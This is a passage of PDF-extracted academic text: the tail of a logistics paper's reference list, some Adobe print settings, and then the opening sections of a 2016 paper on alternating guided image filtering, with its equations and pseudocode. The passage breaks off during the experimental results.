Pötsch T, Yi S, Zuñiga R, Safaei M, Issa S, Rügge I. 2013. Resources in logistics - a multidisciplinary challenge. In: Proceedints of the 6th International Federation of Automatic Control Conference on Management and Control of Production and Logistics (IFAC 2013). 449–455. Mandziuk Z, Swiechowski M. 2017. UCT in capacitated vehicle routing problem with traffic jams. Information Sciences 406-407:42–56 DOI 10.1016/j.ins.2017.04.020. Mora-Morales E. 2014. Estado actual de la diabetes mellitus en el mundo. Acta Medica Costarricense 56(2):44–46. Mulloorakam AT, Nidhiry NM. 2019. Combined objective optimization for vehicle routing using genetic algorithm. Materials Today: Proceedings 11(3):891–902 DOI 10.1016/j.matpr.2018.12.016. Muriana C. 2016. An EOQ model for perishable products with fixed shelf life under stochastic demand conditions. European Journal of Operational Research 255(2):388–396 DOI 10.1016/j.ejor.2016.04.036. Mysen E. 2012. GOCE quasigeoid performance for Norway. International Journal of Applied Earth Observation and Geoinformation 35:136–139 DOI 10.1016/j.jag.2013.09.008. Negreiros M, Palhano A. 2006. The capacitated centred clustering problem. Computers & Operations Research 33(6):1639–1663 DOI 10.1016/j.cor.2004.11.011. Nogueira-Lorena LA. 2007. Problem Instances. Available at http://www.lac.inpe.br/~lorena/ instancias.html. Olivares-Reyes JA, Arellano Plancarte A. 2008. Bases moleculares de las acciones de la insulina. Red de Revistas Cientificas de America Latina, el Caribe, España y Portugal 27(1):9–18. Oliveira D, Uchoa E, Pecin D, Pessoa A, Poggi M, Vidal T, Subramanian A. 2019. CVRPLIB capacitated vehicle routing problem library. Available at http://vrp.atd-lab.inf.puc-rio.br/index. php/en/. Caballero-Morales (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.329 29/31 http://dx.doi.org/10.1016/j.proeng.2017.06.054 http://dx.doi.org/10.1016/j.ijpe.2014.11.022 http://dx.doi.org/10.1504/IJMOR.2015.068291 http://dx.doi.org/10.1155/2018/8961505 http://dx.doi.org/10.1016/j.ins.2017.04.020 http://dx.doi.org/10.1016/j.matpr.2018.12.016 http://dx.doi.org/10.1016/j.ejor.2016.04.036 http://dx.doi.org/10.1016/j.jag.2013.09.008 http://dx.doi.org/10.1016/j.cor.2004.11.011 http://www.lac.inpe.br/~lorena/instancias.html http://www.lac.inpe.br/~lorena/instancias.html http://vrp.atd-lab.inf.puc-rio.br/index.php/en/ http://vrp.atd-lab.inf.puc-rio.br/index.php/en/ http://dx.doi.org/10.7717/peerj-cs.329 https://peerj.com/computer-science/ Pelegrin B, Fernandez P, Garcia MD. 2018. Computation of multi-facility location nash equilibria on a network under quantity competition. Networks and Spatial Economics 18(4):999–1017 DOI 10.1007/s11067-019-09463-8. Prodhon C, Prins C. 2014. A survey of recent research on location-routing problems. European Journal of Operational Research 238(1):1–17 DOI 10.1016/j.ejor.2014.01.005. Rao K, Stenger A, Wu HJ. 1998. Integrating the use of computers in logistics education. International Journal of Physical Distribution & Logistics Management 28(4):302–319 DOI 10.1108/09600039810222756. Reinelt G. 1991. TSPLIB: a traveling salesman problem library. ORSA Journal on Computing 3(4):376–384 DOI 10.1287/ijoc.3.4.376. Reinelt G. 1997. TSPLIB. Available at http://elib.zib.de/pub/mp-testdata/tsp/tsplib/tsplib.html. Richardson D. 2019. Dealing with geoprivacy and confidential geospatial data. ArcNews Spring:30. Rojas-Cuevas ID, Caballero-Morales SO, Martinez-Flores JL, Mendoza-Vazquez JR. 2018. Capacitated vehicle routing problem model for carriers. Journal of Transport and Supply Chain Management 12(2):1–9 DOI 10.4102/jtscm.v12i0.345. Sachan A, Datta S. 2005. Review of supply chain management and logistics research. International Journal of Physical Distribution & Logistics Management 35(9):664–705 DOI 10.1108/09600030510632032. Sanchez-Vega MR, Caballero-Morales SO, Sanchez-Partida D, Martinez-Flores JL. 2019. Risk-based strategic inventory supply model for new products. In: García Alcaraz J, Rivera Cadavid L, González-Ramírez R, Leal Jamil G, Chong Chong M, eds. Best Practices in Manufacturing Processes. Cham: Springer, 75–95. Sevgen A. 2016. A continuous-review inventory model with disruptions and reorder point. Master thesis. Graduate School of Natural and Applied Sciences, Izmir University of Economics. Sitek P, Wikarek J, Rutczynska-Wdowiak K, Bocewicz G, Banaszak Z. 2020. Optimization of capacitated vehicle routing problem with alternative delivery, pick-up and time windows: a modified hybrid approach. Neurocomputing 1–9 DOI 10.1016/j.neucom.2020.02.126. Stefanello F, CB-de-Araújo O, Müller F. 2015. Matheuristics for the capacitated p-median problem. International Transactions in Operational Research 22(1):149–167 DOI 10.1111/itor.12103. Tao Y, Wang F. 2015. An effective tabu search approach with improved loading algorithms for the 3L-CVRP. Computers & Operations Research 55:127–140 DOI 10.1016/j.cor.2013.10.017. Thinakaran N, Jayaprakas J, Elanchezhian C. 2019. Survey on inventory model of EOQ & EPQ with partial backorder problems. Materials Today: Proceedings 16:629–635 DOI 10.1016/j.matpr.2019.05.138. Toffolo TAM, Vidal T, Wauters T. 2019. Heuristics for vehicle routing problems: sequence or set optimization? Computers & Operations Research 105:118–131 DOI 10.1016/j.cor.2018.12.023. Tokgöz E, Trafalis T. 2017. 2-Facility manifold location routing problem. Optimization Letters 11(2):389–405 DOI 10.1007/s11590-015-0984-2. Tsilas CS, De-Souza RJ, Blanco-Mejia S, Mirrahimi A, Cozma AI, Jayalath VH, Ha V, Tawfik R, Di-Buono M, Jenkins AL, Leiter LA, Wolever TMS, Beyene J, Khan T, Jenkins DJA, Kendall CWC, Sievenpiper JL. 2017. Relation of total sugars, fructose and sucrose with incident type 2 diabetes: a systematic review and meta-analysis of prospective cohort studies. Canadian Medical Association Journal 189(20):711–720 DOI 10.1503/cmaj.160706. Caballero-Morales (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.329 30/31 http://dx.doi.org/10.1007/s11067-019-09463-8 http://dx.doi.org/10.1016/j.ejor.2014.01.005 http://dx.doi.org/10.1108/09600039810222756 http://dx.doi.org/10.1287/ijoc.3.4.376 http://elib.zib.de/pub/mp-testdata/tsp/tsplib/tsplib.html http://dx.doi.org/10.4102/jtscm.v12i0.345 http://dx.doi.org/10.1108/09600030510632032 http://dx.doi.org/10.1016/j.neucom.2020.02.126 http://dx.doi.org/10.1111/itor.12103 http://dx.doi.org/10.1016/j.cor.2013.10.017 http://dx.doi.org/10.1016/j.matpr.2019.05.138 http://dx.doi.org/10.1016/j.cor.2018.12.023 http://dx.doi.org/10.1007/s11590-015-0984-2 http://dx.doi.org/10.1503/cmaj.160706 http://dx.doi.org/10.7717/peerj-cs.329 https://peerj.com/computer-science/ Uchoa E, Pecin D, Pessoa A, Poggi M, Vidal T, Subramanian A. 2017. New benchmark instances for the capacitated vehicle routing problem. European Journal of Operational Research 257(3):845–858 DOI 10.1016/j.ejor.2016.08.012. Wei L, Zhang Z, Zhang D, Leung SCH. 2018. A simulated annealing algorithm for the capacitated vehicle routing problem with two-dimensional loading constraints. European Journal of Operational Research 265(3):843–859 DOI 10.1016/j.ejor.2017.08.035. Yao J, Murray AT. 2020. A spatial optimization approach for solving a multi-facility location problem with continuously distributed demand. In: Thill JC, ed. Innovations in Urban and Regional Systems. New York: Springer, 113–135. Zäpfel G, Braune R, Bögl M. 2010. Metaheuristic search concepts: a tutorial with applications to production and logistics. Heidelberg Dordrecht London New York: Springer. Caballero-Morales (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.329 31/31 http://dx.doi.org/10.1016/j.ejor.2016.08.012 http://dx.doi.org/10.1016/j.ejor.2017.08.035 http://dx.doi.org/10.7717/peerj-cs.329 https://peerj.com/computer-science/ Development of a coded suite of models to explore relevant problems in logistics Introduction Development of test instances Distance metrics Inventory control Solving methods for routing and facility location problems Application case Results and conclusions References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS /CHT /DAN /DEU /ESP /FRA /ITA /JPN /KOR /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR /PTB /SUO /SVE /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_45agadeerbhszh2kmiv4s3yymm ---- Submitted 17 April 2016 Accepted 5 June 2016 Published 27 June 2016 Corresponding author Alexander Toet, lextoet@gmail.com Academic editor Klara Kedem Additional Information and Declarations can be found on page 17 DOI 10.7717/peerj-cs.72 Distributed under Creative Commons Public Domain Dedication OPEN ACCESS Alternating guided image filtering Alexander Toet TNO, Soesterberg, The Netherlands ABSTRACT Edge preserving filters aim to simplify the representation of images (e.g., by reducing noise or eliminating irrelevant detail) while preserving their most significant edges. These filters are typically nonlinear and locally smooth the image structure while minimizing both blurring and over-sharpening of visually important edges. Here we present the Alternating Guided Filter (AGF) that achieves edge preserving smoothing by combining two recently introduced filters: the Rolling Guided Filter (RGF) and the Smooth and iteratively Restore Filter (SiR). We show that the integration of RGF and SiR in an alternating iterative framework results in a new smoothing operator that preserves significant image edges while effectively eliminating small scale details. The AGF combines the large scale edge and local intensity preserving properties of the RGF with the edge restoring properties of the SiR while eliminating the drawbacks of both previous methods (i.e., edge curvature smoothing by RGF and local intensity reduction and restoration of small scale details near large scale edges by SiR). The AGF is simple to implement and efficient, and produces high-quality results. We demonstrate the effectiveness of AGF on a variety of images, and provide a public code to facilitate future studies. Subjects Algorithms and Analysis of Algorithms, Computer Vision Keywords Guided Filter, Edge preserving filter, Bilateral filter, Alternating Guided Filter, Rolling Guided Filter, Image enhancement, Noise reduction, Edge enhancement, Image smoothing, Image filtering INTRODUCTION Natural scenes contain meaningful visual elements at different spatial scales. Small elements typically represent texture, small objects, and noise, while large scale structures generally represent object or region boundaries, spatial color transitions, or homogeneous regions. Spatial filtering is a common operation in image processing and computer vision that is typically used to reduce noise or eliminate small spurious details (e.g., texture) and enhance image contrast. In spatial filtering, the value of the filtered image at a given location is a function of the original pixel values in a small neighborhood of the same location. In linear filtering, the value of an output pixel is a linear combination (e.g., a weighted average) of the values of the pixels in the input pixel’s neighborhood. When the image intensity varies smoothly over space, nearby pixels are likely to have similar values (i.e., they will be correlated). In contrast, the noise that corrupts these pixel values will be less correlated than the signal values, so that averaging reduces noise while preserving the mean signal value. However, the assumption of smooth variation evidently does not hold near edges. Thus, although linear filtering can effectively reduce image noise and eliminate unwanted details smaller than the filter kernel size, it degrades the articulation of (blurs) How to cite this article Toet (2016), Alternating guided image filtering. PeerJ Comput. Sci. 2:e72; DOI 10.7717/peerj-cs.72 https://peerj.com mailto:lextoet@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.72 http://creativecommons.org/publicdomain/zero/1.0/ http://creativecommons.org/publicdomain/zero/1.0/ http://creativecommons.org/publicdomain/zero/1.0/ http://dx.doi.org/10.7717/peerj-cs.72 the remaining edges, lines and other details that are important for the interpretation of the image. Therefore, edge preserving filters have been developed that reduce small (relative to the filter kernel size) scale image variations (noise or texture) while preserving larger scale discontinuities (edges). Some well-known non-linear edge-preserving smoothing filters are for instance anisotropic diffusion (Perona & Malik, 1990), robust smoothing (Black et al., 1998) and the bilateral filter (Tomasi & Manduchi, 1998). However, anisotropic diffusion tends to oversharpen edges (i.e., it produces halos) and is computationally expensive, which makes it less suitable for application, for instance, in multiresolution schemes (Farbman et al., 2008). The non-linear bilateral filter (BLF) assigns each pixel a weighted mean of its neighbors, with the weights decreasing both with spatial distance and with difference in value (Tomasi & Manduchi, 1998). While the BLF is quite effective at smoothing small intensity changes while preserving strong edges and has efficient implementations, it also tends to blur across edges at larger spatial scales, thereby limiting its value for application in multiscale image decomposition schemes (Farbman et al., 2008). In addition, the BLF has the undesirable property that it can reverse the intensity gradient near sharp edges (the weighted average becomes unstable when a pixel has only few similar pixels in its neighborhood: He, Sun & Tang, 2013). In the joint (or cross) bilateral filter (JBLF) a second or guidance image serves to steer the edge stopping range filter thus preventing over- or under- blur near edges (Petschnigg et al., 2004). The recently-introduced Guided Filter (GF: He, Sun & Tang, 2013) is a computationally efficient, edge-preserving translation-variant operator based on a local linear model which avoids the drawbacks of bilateral filtering and other previous approaches. When the input image also serves as the guidance image, the GF behaves like the edge preserving BLF. However, similar to the BLF, the GF also tends to produce halos near significant edges. Two recently presented iterative guided filtering frameworks have the ability to perform edge preserving filtering without the introduction of halos. Zhang et al. (2014) showed that the application of the JBLF in an iterative Rolling Guided Filter (RGF) framework results in size selective filtering of small scale details combined with the recovery of larger scale edges. However, the RGF also has a drawback: it tends to smooth the curvature of large scale edges. Kniefacz & Kropatsch (2015) recently introduced a similar framework called the Smooth and iteratively Restore (SiR) filter. SiR restores large scale edges while preserving their curvature. However, SiR also has two drawbacks: it reduces the local image intensity and restores small scale details in the neighborhood of large scale edges. In this paper we propose an Alternating Guided Filter (AGF) scheme that integrates the RGF and SiR in a single framework, resulting in a new image smoothing operator that preserves significant edges while effectively eliminating small scale details. AGF combines the edge preserving properties of both the RGF (i.e., the elimination of small details in combination with local intensity preservation) and the SiR (i.e., the articulated restoration of large scale edges) while it does not suffer from their respective drawbacks (the curvature smoothing of large scale edges by RGF and local intensity reduction in combination with the restoration of small scale details near large scale edges by SiR). Toet (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.72 2/18 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.72 The rest of this paper is organized as follows. ‘Related Work’ briefly discusses some related work on edge preserving filtering and introduces the RGF and SiR filter techniques on which the proposed AGF scheme is based. ‘Alternating Guided Filter’ presents the proposed Alternating Guided Filter scheme. ‘Experimental Results’ presents the results of the application of the AGF filter to natural and synthetic images, compares the performance of this new framework with the RGF and SiR filter schemes, and provides some runtime estimates. Finally, in ‘Conclusions’ the conclusions of this study are presented. RELATED WORK In this section we briefly review the edge preserving bilateral and joint bilateral filters and show how they are related to the guided filter. We also discuss two recently introduced frameworks that iteratively apply joint bilateral filters to achieve selective guided filtering of small scale details in combination with large scale edge restoration. Bilateral filter The bilateral filter is a non-linear filter that computes the output at each pixel as a Gaussian weighted average of their spatial and intensity distances. It prevents blurring across edges by assigning larger weights to pixels that are spatially close and have similar intensity values (Tomasi & Manduchi, 1998). It uses a combination of (typically Gaussian) spatial and a range (intensity) filter kernels that perform a blurring in the spatial domain weighted by the local variation in the intensity domain. It combines a classic low-pass filter with an edge-stopping function that attenuates the filter kernel weights at locations where the intensity difference between pixels is large. Bilateral filtering was developed as a fast alternative to the computationally expensive technique of anisotropic diffusion, which uses gradients of the filtering images itself to guide a diffusion process, thus avoiding edge blurring (Perona & Malik, 1990). More formally, at a given image location (pixel) i, the filtered output Oi is given by: Oi= 1 Ki ∑ j∈� Ijf (‖i−j‖)g(‖Ii−Ij‖) (1) where f is the spatial filter kernel (e.g., a Gaussian centered at i), g is the range or intensity (edge-stopping) filter kernel (centered at the image value at i), � is the spatial support of the kernel, Ki is a normalizing factor (the sum of the f ·g filter weights). The bilateral filter is controlled by only two parameters: the extent of respectively the spatial kernel and the range kernel. Intensity edges are preserved since the bilateral filter decreases not only with the spatial distance but also with the intensity distance. Though the filter has efficient implementations (Paris & Durand, 2006) and effectively reduces noise while preserving edges in many situations, it has the undesirable property that it can reverse the intensity gradient near sharp edges (the weighted average becomes unstable when a pixel has only few similar pixels in its neighborhood (He, Sun & Tang, 2013)). Toet (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.72 3/18 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.72 In the joint (or cross) bilateral filter (JBLF) the range filter g is applied to a second or guidance image G (Petschnigg et al., 2004): Oi= 1 Ki ∑ j∈� Ij ·f (‖i−j‖)·g(‖Gi−Gj‖). (2) The JBLF can prevent over- or under- blur near edges by using a related image G to guide the edge stopping behavior of the range filter. That is, the JBLF smooths the image I while preserving edges that are also represented in the image G. The JBLF is particularly favored when the edges in the image that is to be filtered are unreliable (e.g., due to noise or distortions) and when a companion image with well-defined edges is available (e.g., in the case of flash /no-flash image pairs). Guided Filter A Guided Filter (GF: He, Sun & Tang, 2013) is a translation-variant filter based on a local linear model. Guided image filtering involves an input image I, a guidance image G (which may be identical to the input image), and an output image O. The two filtering conditions are (i) that the local filter output is a linear transform of the guidance image G and (ii) as similar as possible to the input image I. The first condition implies that Oi=akGi+bk ∀i∈ωk (3) where ωk is a square window of size (2r+1)×(2r+1). The local linear model ensures that the output image O has an edge only at locations where the guidance image G has one, because ∇O=a∇G. The linear coefficients ak and bk are constant in ωk. They can be estimated by minimizing the squared difference between the output image O and the input image I (the second filtering condition) in the window ωk, i.e., by minimizing the cost function E: E(ak,bk)= ∑ i∈ωk ( (akGi+bk−Ii) 2 +εa2k ) (4) where ε is a regularization parameter penalizing large ak. The coefficients ak and bk can directly be solved by linear regression (He, Sun & Tang, 2013): ak = 1 |ω| ∑ i∈ωk GiIi−GkIk σ2k +ε (5) bk = Ik−akGk (6) where |ω| is the number of pixels in ωk, Ik and Gk represent the means of respectively I and G over ωk, and σ2k is the variance of I over ωk. Since pixel i is contained in several different (overlapping) windows ωk, the value of Oi in Eq. (3) depends on the window over which it is calculated. This can be accounted for by averaging over all possible values of Oi: Oi= 1 |ω| ∑ k|i∈ωk (akGk+bk). (7) Toet (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.72 4/18 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.72 Since ∑ k|i∈ωk ak = ∑ k∈ωiak due to the symmetry of the box window Eq. (7) can be written as Oi=aiGi+bi (8) where ai = 1 |ω| ∑ k∈ωiak and bi = 1 |ω| ∑ k∈ωibk are the average coefficients of all windows overlapping i. Although the linear coefficients (ai,bi) vary spatially, their gradients will be smaller than those of G near strong edges (since they are the output of a mean filter). As a result we have ∇O≈a∇G, meaning that abrupt intensity changes in the guiding image G are still largely preserved in the output image O. Equations (5), (6), and (8) define the GF. When the input image also serves as the guidance image, the GF behaves like the edge preserving bilateral filter, with the parameters ε and the window size r having the same effects as respectively the range and the spatial variances of the bilateral filter. Equation (8) can be rewritten as Oi= ∑ j Wij(G)Ij (9) with the weighting kernel Wij depending only on the guidance image G: Wij = 1 |ω|2 ∑ k:(i,j)∈ωk ( 1+ (Gi−Gk)(Gj−Gk) σ2k +ε ) . (10) Since ∑ jWij(G)=1 this kernel is already normalized. The GF is a computationally efficient, edge-preserving operator which avoids the gradient reversal artefacts (i.e., over sharpening of edges) of the BLF. However, just like the BLF, GF has the limitation that it tends to produce halos (unwanted blurring) near large scale edges (He, Sun & Tang, 2013). Rolling Guidance Filter Zhang et al. (2014) showed that the application of the joint bilateral filter (Eq. (2)) in an iterative framework results in effective size selective filtering of small scale details combined with the recovery of larger scale edges. In their Rolling Guidance Filter (RGF) framework the result Gt+1 of the tth iteration is obtained from the joint bilateral filtering of the input image I using the result Gt of the previous iteration step as the guidance image: Gt+1i = 1 Ki ∑ j∈� Ij ·f (‖i−j‖)·g(‖G t i −G t j‖). (11) In the RGF scheme details smaller than the Gaussian kernel of the bilateral filter are initially removed while the edges of the remaining details are restored by iteratively updating the guidance image. At the start of the iteration process the term ‖Gti −G t j‖ is almost zero, making the range filter g inoperative, so that the joint bilateral filter effectively behaves like a Gaussian filter. Details removed by this filter cannot be recovered later in the process. After each iteration step the influence of the range filter gradually increases due to its Toet (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.72 5/18 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.72 Table 1 Rolling Guidance Filter (RGF) algorithm (from Zhang et al. (2014)). Input: input image I, σspatial, σrange, N iter Output: output image O Procedure: 1: Initialize G0 as a constant image 2: for t :=1 to N iter do 3: Gt ← JointBilateralFilter(I,Gt−1,σspatial,σrange) {Input: I; Guidance: Gt−1} 4: end for 5: O←GN iter increasing weights. Hence, guided by the input image I, the RGF scheme gradually restores the edges that remain after the initial Gaussian filtering. Note that the initial guidance image G1 can simply be a constant (e.g., zero) valued image since it updates to the Gaussian filtered input image in the first iteration step. The pseudocode for the RGF scheme is presented in Table 1. The RGF scheme is not restricted to the JBF (Zhang et al., 2014). Any average-based joint edge aware averaging filter (e.g., the Guided Filter) can be applied in the RGF framework. In practice the RGF converges rapidly after only a few (3–5) iterations steps. The RGF scheme is simple to implement and can be efficiently computed. Although the RGF enables effective and efficient size selective filtering, it has as drawback that the remaining large scale edges are smoothly curved. Smooth and iteratively Restore filter Kniefacz & Kropatsch (2015) recently introduced the Smooth and iteratively Restore (SiR) filter. Similar to RGF, SiR initially removes small scale details (e.g., through Gaussian filtering) and uses an edge-aware filter to iteratively restore larger scale edges. Whereas RGF iteratively filters the (fixed) input image while iteratively restoring the initially blurred guidance image, SiR does the opposite: it gradually restores the initially blurred image using the original input image as (fixed) guidance. Thereto, small details are initially removed through blurring with a Gaussian kernel: G0i = 1 K ∑ j∈� Ij ·f (‖i−j‖). (12) Then, the edges of the remaining details are iteratively restored by repeatedly computing an updated image Gt+1 by joint bilateral filtering of the blurred image Gt using the input image I as the guidance image: Gt+1i = 1 Ki ∑ j∈� Gtj ·f (‖i−j‖)·g(‖Ii−Ij‖). (13) Similar to RGF, SiR converges rapidly after only a few (3–5) iterations steps. Compared to RGF, SiR has the advantage that it produces edges with articulated curvature, since it attempts to restore them as similar as possible to the edges in the original image. In contrast, the curvature of edges produced by RGF is smoothed (less articulated). Toet (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.72 6/18 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.72 Table 2 Smooth and iteratively Restore with median filtering (SiRmed) algorithm (adapted from Kniefacz & Kropatsch (2015)). Input: input image I, σspatial, σrange, N iter Output: output image O Procedure: 1: Initialize G0 as a Gaussian filtered version of the input image I 2: for t:=1 to Niter do 3: Gt ← JointBilateralFilter(Gt−1,I,σspatial,σrange) {Input: Gt−1; Guidance: I} 4: Gt ←MedianFilter(Gt ) 5: end for 6: O←GN iter SiR also has two drawbacks (Kniefacz & Kropatsch, 2015). First, the overall intensity of the result is less than the overall intensity of the original image, since SiR restores edges starting from the initially blurred input image. RGF does not have this problem because it operates on the original image itself. Second, SiR tends to restore small scale details that are close to large scale edges. This is a result of a spill-over effect (blurring) of the large scale edges which enables the JBF (Eq. (13)) to restore small scale details guided by the original input image. As will be shown in ‘Relative performance of SiR and SiRmed’ this restoration of small details near larger edges by SiR can effectively be suppressed by applying a median filter at the end of each iteration step with a kernel that is smaller than the Gaussian kernel of the bilateral spatial filter (e.g., 3×3). At each iteration step the median filer ‘‘cleans’’ the image by removing small details that are recovered by the bilateral filter. In the rest of this paper, we will refer to this modification of the original SiR algorithm as SiRmed (Smooth and iteratively Restore including median filtering). The pseudocode for the SiRmed algorithm is presented in Table 2. The pseudocode for the SiR algorithm is obtained by omitting Step 5 (the median filter). ALTERNATING GUIDED FILTER In this section we propose a new filter scheme that effectively integrates the RGF and SiR frameworks in such a way that it retains the desired effects of both earlier schemes (i.e., the elimination of small details and restoration of large scale edges) while eliminating their respective drawbacks (i.e., the smoothing of the curvature of large scale edges by RGF and the loss of local image intensity by SiR). Each iteration in the AGF framework consists of three consecutive steps. First, joint bilateral filtering is applied to the input image I, using the result Gt of the previous iteration step as the guidance image (Eq. (11)). Second, joint bilateral filtering is applied to the result from the first step, using the original image I as the guidance image (Eq. (13)). Third, a median filter with a small kernel size (e.g., 3×3) is applied to the result of the second step. The alternating use of the original image and the filtered result as either input or guidance images guarantees that both the overall image intensity (positive effect of the RGF scheme) and the curvature of the large scale edges (positive effect of the SiR scheme) are preserved, while the integration of the median filter Toet (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.72 7/18 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.72 Table 3 Alternating Guided Filter (AGF) algorithm. Input: input image I, σspatial, σrange, Niter Output: output image O Procedure: 1: Initialize G0 as a constant image 2: for t:=1 to N iter do 3: Gt ← JointBilateralFilter(I,Gt−1,σspatial,σrange) {Input: I; Guidance: Gt−1} 4: Gt ← JointBilateralFilter(Gt,I,σspatial,σrange) {Input: Gt ; Guidance: I } 5: Gt ←MedianFilter(Gt ) 6: end for 7: O←GN iter prevents the reintroduction of filtered small scale details near large scale edges (a negative side effect of SiR). Hence, the AGF scheme combines the positive effects of both the RGF (intensity preservation) and SiR (edge curvature preservation) while eliminating their negative side effects (edge curvature smoothing by the RGF scheme and contrast reduction plus the reintroduction of small details near larger edges by the SiR scheme). The pseudo code for the AGF scheme is presented in Table 3. EXPERIMENTAL RESULTS In this section we present the results of some experiments that were performed to study the performance of the proposed AGF framework. We tested AGF by applying it to a wide range of different natural images (for an overview of all results see the Supplemental Information with this paper). Also, we compare the performance of AGF with that of RGF and SiRmed. The images used in this study have a width of 638 pixels, and a height that varies between 337 and 894 pixels. We selected a set of test images with widely varying features and statistics, such as landscapes and aerial images, portraits and mosaics, embroidery and patchwork. The full set of test images with the results of the different filter schemes are provided as Supplemental Information. In this study, color images are processed by applying the different algorithms to each channel in RGB color space independently. This was done to enable straightforward comparison with the results from previous studies (Kniefacz & 